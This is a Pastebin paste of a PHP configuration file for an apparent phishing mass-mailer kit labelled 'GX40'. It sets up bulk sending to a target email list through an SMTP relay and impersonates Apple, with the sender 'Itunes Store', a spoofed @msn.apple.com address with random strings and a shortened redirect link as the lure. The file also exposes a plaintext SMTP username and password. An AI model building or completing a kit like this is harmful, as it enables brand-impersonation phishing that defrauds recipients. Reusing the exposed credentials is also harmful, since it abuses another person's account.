Advertisement
Guest User

Untitled

a guest
Apr 13th, 2018
279
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.07 KB | None | 0 0
  1. <?php
  2.  
  3. $regards = "
  4.  
  5. ██████╗ ██╗ ██╗██╗ ██╗ ██████╗
  6. ██╔════╝ ╚██╗██╔╝██║ ██║██╔═████╗
  7. ██║ ███╗ ╚███╔╝ ███████║██║██╔██║
  8. ██║ ██║ ██╔██╗ ╚════██║████╔╝██║
  9. ╚██████╔╝██╔╝ ██╗ ██║╚██████╔╝
  10. ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝
  11.  
  12. ";
  13.  
  14. /*
  15.  
  16.  
  17. Setting your fucking needs here!!
  18.  
  19. Fiture :
  20.  
  21. * Random From Mail with List in script.
  22. * Random From Name with List in script.
  23. * Random Subject with List in script.
  24. * Random Character.
  25. * Random Number.
  26. (+) Tag Replace Email, Tag Random Subject, etc. Use this in ur letter
  27.  
  28. ##email## : replace the contents of the letter to show the recipient's email
  29. ##subject## : Using random subject
  30. ##frommail## : Using random From mail
  31. ##fromname## : Using random From name
  32. ##short## : Using random your URL
  33. ##country## : Using random country around the world
  34. ##date## : Using date time. (NOT RANDOM)
  35. ##OS## : Using random Operating Systems
  36. ##browser## : Using random Browsers
  37. ##randomip## : Using randomg IP
  38. (+ NOte ) Learning Toolkit Using Latter GX40 - Learning.html (letter/GX40 - Learning.html)
  39. Rondom Email : no-reply.##randstring##@msn.apple.com <--- Change Domain Address
  40. */
  41.  
  42. /* Pengaturan smtpserver */
  43.  
  44. $smtpserver = "smtp-relay.gmail.com"; // Required
  45.  
  46. $smtpuser = "riky@nakdek4.com"; // Required
  47.  
  48. $smtppass = "kimak1aja1"; // Required
  49.  
  50. $smtpport = "587"; // Required
  51.  
  52. $priority = 1; // 1 = High Priority. 0 = Normal Priority
  53.  
  54. # code...
  55. /* end */
  56.  
  57.  
  58.  
  59. /* Random Fiture */
  60.  
  61. $userandom = 0; // 1 untuk menggunakan, 0 untuk tidak
  62. $sleeptime = 3; // Waktu jeda tiap mail. Default 3
  63.  
  64. /* End */
  65.  
  66.  
  67.  
  68. /* Setting your f*cking list */
  69.  
  70. $mailist = "target/a.txt"; // Isi nama file mailist kamu
  71.  
  72. /* End */
  73.  
  74.  
  75. /* Pengaturan mail */
  76.  
  77. $fromname = "Itunes Store"; // Kosongkan jika menggunakan random fitures Secure@apple.com
  78.  
  79. $frommail = "noreply-robot-##randstring###randstring##officedepartmentt##randstring##@msn.apple.com"; // Kosongkan jika menggunakan random fiture
  80.  
  81. $subject = ""; // Kosongkan jika menggunakan random fiture
  82.  
  83. $msgfile = "letter/new.html"; //Letter harus mengikuti rule GX40 - MIX.html
  84.  
  85. $replacement = 1; // Untuk mengaktifkan function replace. 1 untuk menggunakan, 0 untuk tidak.
  86.  
  87. /* End */
  88.  
  89.  
  90. /* Rand url */
  91. /* For Using Multi (Random Directlink)*/
  92. /* $randurl = array("https://bing.com","https://google.com");
  93. /* For Using single Directlink */
  94. $randurl = array("https://goo.gl/w78dHc");
  95. // Kosongkan jika tidak menggunakan
  96.  
  97.  
  98. /* End */
  99.  
  100.  
  101. /* Menghapus email yang telah di eksekusi */
  102.  
  103. $userremoveline = 0; //
  104.  
  105. /* End */
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement